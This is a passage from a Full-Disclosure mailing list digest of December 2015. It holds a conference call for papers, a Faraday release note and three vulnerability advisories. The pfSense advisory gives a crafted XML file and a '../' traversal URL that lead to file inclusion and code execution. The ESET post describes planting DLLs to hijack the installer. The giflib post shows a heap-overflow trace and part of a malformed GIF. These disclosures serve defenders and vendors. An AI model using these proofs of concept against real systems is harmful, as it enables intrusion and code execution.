[FD] Call for Papers -YSTS X - Information Security Conference, Brazil

2015-12-21 Thread Luiz Eduardo 
Hello Full-Disclosure readers and sorry for the possible cross-postings you
might see, on behalf of the conference's organization team I would like to
let you know that YSTS X's CFP is currently opened.


YSTS 10th Edition

Where: Sao Paulo, Brazil

When:  June 13th, 2016

Call for Papers Opens: December 13th, 2015

Call for Papers Close: March 1st, 2016

http://www.ysts.org

@ystscon

INTRODUCTION

This is the celebratory 10th edition of the well-known information security
conference “you Sh0t the Sheriff”
and we are sending this CFP out so you share with us the coolest stuff
you've been working on.

The conference will be happening on June, 13th in a secret location within
the city of Sao Paulo, Brazil.
This is a great opportunity for you to speak about the latest research you
have been working on to the
most influential crowd in the Brazilian Information Security realm.

ABOUT THE CONFERENCE

you Sh0t the Sheriff is a very unique, one-day, event dedicated to bringing
cutting edge talks to the top-notch
professionals of the Braziliian Information Security Community.

The conference’s main goal is to bring the attendees to the current state
of the information security world by
bringing the most relevant topics from different Infosec segments of the
market and providing an
environment that is ideal for both networking and idea sharing.

YSTS is a an exclusive, mostly invite-only security con.
Getting a talk accepted, will, not only get you to the event, but after you
successfully present your talk, you will receive a challenge-coin that
guarantees your entry to YSTS for as long as the conference exists.

Due to the great success of the previous years' editions, yes, we're
keeping the good old usual format:

* YSTS 10 will be held at an almost secret location only announced to whom
it may concern a couple of weeks before the con

* the venue will be, most likely, a very cool club or a bar
(seriously, look at the pictures)

* appropriate environment to network with great security folks from
Brazil and abroad

* since it is a one-day con with tons of talks and activities, we make sure
we fill everyone with coffee, food and booze

CONFERENCE FORMAT

Anything Information Security related is interesting for the conference,
which will help us create a cool and diverse line-up.
We strictly *do not* accept commercial/ product-related pitches.
Keep in mind though, this is a one-day conference, we receive a lot of
submissions, so your unique research with cool demos and any other
possible twist you can throw in to keep the audience engaged will surely
stand out to the other papers.

Just in case you need some ideas, some of the topics in security that could
be interesting to us:

* Mobile Devices & BY0D - Bring your 0wn3d Device

* Real Social Networking Threats

* Embedded Systems

* Everything in Offensive Security

* "the" Cloud

* Inside Jobs Detection/ Techniques

* Big Data

* Small Data

* Tiny Data (the type that breaks big things)

* Internet of all the things you can break

* Career & Management topics

* (cool and useful) Information Security Policies

* Privacy in the Digital World

* Messing with Network Protocols

* RF Stuff

* Mobile Payments

* Authentication

* Incident Response Stories and Policies

* Information Warfare

* Malware/ Botnets

* DDoS Evolution or Stories (or solution, if you have one)

* Secure Programming

* Hacker Culture

* Application Security

* Virtualization

* DataBase Security

* Cryptography

* System Weaknesses

* Infrastructure and Critical Systems

* Reverse Engineering

* Social Reverse Engineering

* Reversing Social Engineering

* Caipirinha and Feijoada Hacks

* and everything else information security related that our attendees
would enjoy, the coolest/ different/ most creative submissions win,
keep that in mind!

We do like shorter talks, so please submit your talks and remember
they must be 30 minutes long. (yes, we do strictly enforce that)

We are also opened to some 15-minute talks, some of the smart people
around might not need 30 minutes to deliver a message, or it might be
a project that has been just kicked-off.

15 minutes might be your thing and that's nothing to be ashamed about.

you Sh0t the Sheriff is the perfect conference to release your new
projects, other people have released very cool research before they
presented it at the bigger cons later in the year. We also like that,
a lot.

And yes, we do prefer new hot-topics. "First-time" speakers are more
than welcome.

If you’ve got good content to present, that's all that matters.

SPEAKER PRIVILEGES

(and yeah, that applies only to the 30 minute-long talks)

* USD 1,000.00 to help covering travel expenses for international speakers

* or R$ 1,200.00 to help covering travel expenses for Brazilian
speakers who live outside of Sao Paulo

* Breakfast, lunch and dinner during conference

* Pre-and-post-conference official party (and the unofficial ones as well)

* Auditing products in traditional

Re: [FD] PFSense <= 2.2.5 Directory Traversal

2015-12-21 Thread Bacon Zombie 
For the lazy;
# Title : PFSense  <= 2.2.5 Directory Traversal
# Date : 18/12/2015
# Author : R-73eN
# Tested on : PFSense 2.2.5
# Software : https://github.com/pfsense/pfsense
# Vendor : https://pfsense.org/
#  _____ __
# |_ _|_ __  / _| ___  / ___| ___ _ __  / \  | |
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \/ _ \ | |
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___
# |___|_| |_|_|  \___/ \|\___|_| |_| /_/   \_\_|
#
#
# Fix provided by the vendor
https://github.com/pfsense/pfsense/commit/3ac0284805ce357552c3ccaeff0a9aadd0c6ea13
#
#

In pfsense <= 2.2.5 (Latest Version) , during a security audit i discovered
the following vulnerabilities in the pfsense Webgui.

The following files are vulnerable to a file inclusion attack

wizard.php?xml=
pkg.php?xml=

Both of this files do not sanitize the path of the xml parameter and we can
load xml files, and loading a special crafted xml file we can gain command
execution.

Example:
1.xml (the filename can be whatever .txt , .jpg etc because it does not
check for the file extension)

The content of the 1.xml should be:



12

1
LFI example 
Lfi example 
on
step1_submitphpaction();
/etc/passwd



the parameter  is passed to a require_once() function which
triggers the File inclusion Attack.
As we all know File inclusion attack can be converted to  RCE  very easily.

Then visiting

http://vulnhost/wizard.php?xml=../../../1.xml

where the "xml" parameter is the path of the crafted file, will trigger the
vulnerability.

Thanks
Rio Sherri
https://www.infogen.al/ - Infogen AL
On Dec 18, 2015 6:27 PM, "Rio Sherri"  wrote:

>
>
>
> ___
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Executable installers are vulnerable^WEVIL (case 13): ESET NOD32 antivirus installer allows remote code execution with escalation of privilege

2015-12-21 Thread Stefan Kanthak 
Hi @ll,

the executable installer [°] of ESET's NOD32 antivirus,
eset_nod32_antivirus_live_installer_.exe, loads and executes
(at least) the rogue/bogus/malicious Cabinet.dll and DbgHelp.dll
eventually found in the directory it is started from ['] (the
"application directory").

For software downloaded with a web browser this is typically the
"Downloads" directory: see
,

and 

If Cabinet.dll or DbgHelp.dll get planted in the users "Downloads"
directory per "drive-by download" (or "social engineering") this
vulnerability becomes a remote code execution.

Due to the application manifest embedded in the executable which
specifies "requireAdministrator" the installer is started with
administrative privileges ("protected" administrators are prompted
for consent, unprivileged standard users are prompted for an
administrator password); execution of Cabinet.dll or DbgHelp.dll
then results in an escalation of privilege!


Proof of concept/demonstration:
~~~

(verified on Windows XP, Windows Vista, Windows 7, Windows Server
2008 [R2]; should work on newer versions too)

1. visit , download
    and store
   it as Cabinet.dll in your "Downloads" directory, then copy it as
   DbgHelp.dll;

2. download eset_nod32_antivirus_live_installer_.exe and store it in
   your "Downloads" directory;

3. run eset_nod32_antivirus_live_installer_.exe from your "Downloads"
   directory;

4. notice the message boxes displayed from the DLLs placed in step 1.

PWNED!


Unsuspecting users who follow the guidance on ESET's web site


| (1) Download the .exe file to your computer and double-click
| it to start installation.

are the typical victims!

JFTR: I REALLY love (especially snakeoil) companies which don't
  protect or at least warn their customers from even the most
  trivial handling errors!


See  plus
 and the still unfinished
 for more details and why
executable installers (and self-extractors too) are bad.


Mitigation(s):
~~

0. DON'T USE EXECUTABLE INSTALLERS [°]!

   If your favourite applications are not distributed in the native
   installer package format of the resp. target platform: ask^WURGE
   their vendors/developers to provide native installation packages.
   If they don't: dump these applications, stay away from such cruft!

1. Turn off UAC's privilege elevation for standard users and installer
   detection for all users:

   
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
   "ConsentPromptBehaviorUser"=dword: ; Automatically deny elevation 
requests
   "EnableInstallerDetection"=dword:

   See 


2. NEVER execute files in UNSAFE directories (like "Downloads" and
   and "%TEMP%")!

3. Deny execution (at least) in the "Downloads" directories and all
   "%TEMP%" directories and their subdirectories:

   * Add the NTFS ACE "(D;OIIO;WP;;;WD)" meaning "deny execution of
 files in this directory for everyone, inheritable to all files
 in all subdirectories" (use CACLS.EXE /S: for example);

   * Use "software restriction policies" resp. AppLocker.

   Consider to apply either/both to every "%USERPROFILE%" as well as
   "%ALLUSERSPROFILE%" alias %ProgramData%" and "%PUBLIC%": Windows
   doesn't place executables in these directories and beyond.

   See  as well as
    plus
   ,
   

   or  and finally
   !


stay tuned
Stefan Kanthak


[°] Self-extracting archives and executable installers are flawed^W
b(rainde)ad in concept and dangerous in practice.

DON'T USE SUCH CRUFT!
ALWAYS use the resp. target platforms native package and archive
format.

For Windows these are .INF (plus .CAB) and .MSI (plus .CAB),
introduced 20 years ago (with Windows 95 and Windows NT4) resp.
16 years ago (with Office 2000).

Both .INF and .MSI are "opened" by programs residing in
%SystemRoot%\System32\ which are therefore immune to this kind
of "DLL and EXE Search Order Hijacking" attack.
Since both .INF and .MSI access the contents of .CAB directly
they eliminate the attack vector "unsafe temporary

[FD] Faraday v1.0.16: (Group vulns by fields, Filter false-positives, Canvas plugin)

2015-12-21 Thread Francisco Amato 
We are proud to present Faraday v1.0.16!

This version comes with major changes to our Web UI, including the
possibility to mark vulnerabilities as false positives. You can now
create an Executive Report using only confirmed vulnerabilities,
saving you even more time.

A brand new feature that comes with v1.0.16 is the ability to group
vulnerabilities by any field in our Status Report view. Combine it
with bulk edit to manage your findings faster than ever!

This release also features several new features developed entirely by
our community.

Changes:
* Added group vulnerabilities by any field in our Status Report
* Added port to Service type target in new vuln modal
* Filter false-positives in Dashboard, Status Report and Executive Report

Filter in Status Report view
* Added Wiki information about running Faraday without configuring
CouchDB https://github.com/infobyte/faraday/wiki/APIs
* Added parametrization for port configuration on APIs
* Added scripts to:
- get all IPs from targets that have no services
(/bin/getAllIpsNotServices.py)
- get all IP addresses that have defined open port
(/bin/getAllbySrv.py) and get all IPs from targets without services
(/bin/delAllVulnsWith.py)
It's important to note that both these scripts hold a
variable that you can modify to alter its behaviour.
/bin/getAllbySrv.py has a port variable set to 8080 by default.
/bin/delAllVulnsWith.py does the same with a RegExp
* Added three Plugins:
- Immunity Canvas
- Dig
- Traceroute
* Refactor Plugin Base to update active WS name in var
* Refactor Plugins to use current WS in temp filename under
$HOME/.faraday/data. Affected Plugins:
- amap
- dnsmap
- nmap
- sslcheck
- wcscan
- webfuzzer
- nikto

Bug fixes:
* When the last workspace was null Faraday wouldn't start
* CSV export/import in QT
* Fixed bug that prevented the use of "reports" and "cwe" strings in
Workspace names
* Unicode support in Nexpose-full Plugin
* Fixed bug get_installed_distributions from handler exceptions
* Fixed bug in first run of Faraday with log path and API errors

More information:
https://github.com/infobyte/faraday
http://blog.infobytesec.com/2015/12/presenting-faraday-1016.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] giflib: heap overflow in giffix (CVE-2015-7555)

2015-12-21 Thread Hans Jerry Illikainen 

About
=

giflib[1] is a library for working with GIF images.  It also provides
several command-line utilities.


CVE-2015-7555
=

A heap overflow may occur in the giffix utility included in giflib-5.1.1
when processing records of the type `IMAGE_DESC_RECORD_TYPE' due to the
allocated size of `LineBuffer' equaling the value of the logical screen
width, `GifFileIn->SWidth', while subsequently having
`GifFileIn->Image.Width' bytes of data written to it.


giflib-5.1.1/util/giffix.c #35..194:
,
| int main(int argc, char **argv)
| {
| [...]
| if ((LineBuffer = (GifRowType) malloc(GifFileIn->SWidth)) == NULL)
| GIF_EXIT("Failed to allocate memory required, aborted.");
| 
| /* Scan the content of the GIF file and load the image(s) in: */
| do {
| [...]
| switch (RecordType) {
| case IMAGE_DESC_RECORD_TYPE:
| if (DGifGetImageDesc(GifFileIn) == GIF_ERROR)
| QuitGifError(GifFileIn, GifFileOut);
| [...]
| Width = GifFileIn->Image.Width;
| Height = GifFileIn->Image.Height;
| [...]
| /* Find the darkest color in color map to use as a filler. */
| ColorMap = (GifFileIn->Image.ColorMap ? 
GifFileIn->Image.ColorMap :
|  GifFileIn->SColorMap);
| for (i = 0; i < ColorMap->ColorCount; i++) {
| j = ((int) ColorMap->Colors[i].Red) * 30 +
| ((int) ColorMap->Colors[i].Green) * 59 +
| ((int) ColorMap->Colors[i].Blue) * 11;
| if (j < ColorIntens) {
| ColorIntens = j;
| DarkestColor = i;
| }
| }
| 
| /* Load the image, and dump it. */
| for (i = 0; i < Height; i++) {
| GifQprintf("\b\b\b\b%-4d", i);
| if (DGifGetLine(GifFileIn, LineBuffer, Width)
| == GIF_ERROR) break;
| if (EGifPutLine(GifFileOut, LineBuffer, Width)
| == GIF_ERROR) QuitGifError(GifFileIn, GifFileOut);
| }
| 
| if (i < Height) {
| [...]
| /* Fill in with the darkest color in color map. */
| for (j = 0; j < Width; j++)
| LineBuffer[j] = DarkestColor;
| for (; i < Height; i++)
| if (EGifPutLine(GifFileOut, LineBuffer, Width)
| == GIF_ERROR) QuitGifError(GifFileIn, GifFileOut);
| }
| break;
| [...]
| }
| }
| while (RecordType != TERMINATE_RECORD_TYPE);
| [...]
| }
`

,
| $ gdb -q --args ./giffix heap.gif
| Reading symbols from ./giffix...done.
| (gdb) b util/giffix.c:94
| Breakpoint 1 at 0x401131: file giffix.c, line 94.
| (gdb) b util/giffix.c:148
| Breakpoint 2 at 0x401449: file giffix.c, line 148.
| (gdb) b util/giffix.c:149
| Breakpoint 3 at 0x401452: file giffix.c, line 149.
| 
| (gdb) commands 3
| Type commands for breakpoint(s) 3, one per line.
| End with a line saying just "end".
| >printf "%p, 0x%02x\n", LineBuffer+j, DarkestColor
| >c
| >end
| 
| (gdb) r
| [...]
| Breakpoint 1, main (argc=2, argv=0x7fffe6b8) at giffix.c:94
| 94  if ((LineBuffer = (GifRowType) malloc(GifFileIn->SWidth)) == NULL)
| 
| (gdb) p GifFileIn->SWidth
| $1 = 1
| 
| (gdb) c
| [...]
| Breakpoint 2, main (argc=2, argv=0x7fffe6b8) at giffix.c:148
| 148 for (j = 0; j < Width; j++)
| 
| (gdb) p Width
| $2 = 255
| 
| (gdb) c
| Continuing.
| 
| Breakpoint 3, main (argc=2, argv=0x7fffe6b8) at giffix.c:149
| 149 LineBuffer[j] = DarkestColor;
| 0x618920, 0x01
| 
| [...]
| 
| Breakpoint 3, main (argc=2, argv=0x7fffe6b8) at giffix.c:149
| 149 LineBuffer[j] = DarkestColor;
| 0x618940, 0x01
| 
| [...]
| 
| Breakpoint 3, main (argc=2, argv=0x7fffe6b8) at giffix.c:149
| 149 LineBuffer[j] = DarkestColor;
| 0x618a1e, 0x01
| 
| Program received signal SIGSEGV, Segmentation fault.
| 0x77bd8658 in GifFreeMapObject (Object=0x101010101010101) at 
gifalloc.c:80
| 80  (void)free(Object->Colors);
`


heap.gif:
,
| unsigned char heap[] = {
| /* GIF87a */
| 0x47, 0x49, 0x46, 0x38, 0x37, 0x61,
| 
| /* DGifGetScreenDesc() */
| 0x01, 0x00, /* GifFile->SWidth */
| 0x01, 0x00, /* GifFile->SHeight */
| 0x80,   /* ColorCount = 1 << ((this & 0x07) + 1) */
| 0x00,   /* GifFile->SBackGroundColor */
| 0x00,   /* GifFile->AspectByte */
| 0x11, 0x11, 0x11,   /* GifFile->SColorMap->Colors[0] */
| 0x00, 0x00, 0x00,   /* GifFile->SColorMap->Colors[1] */
| 
| /* DGifGetRecordType() */
| 0x2c,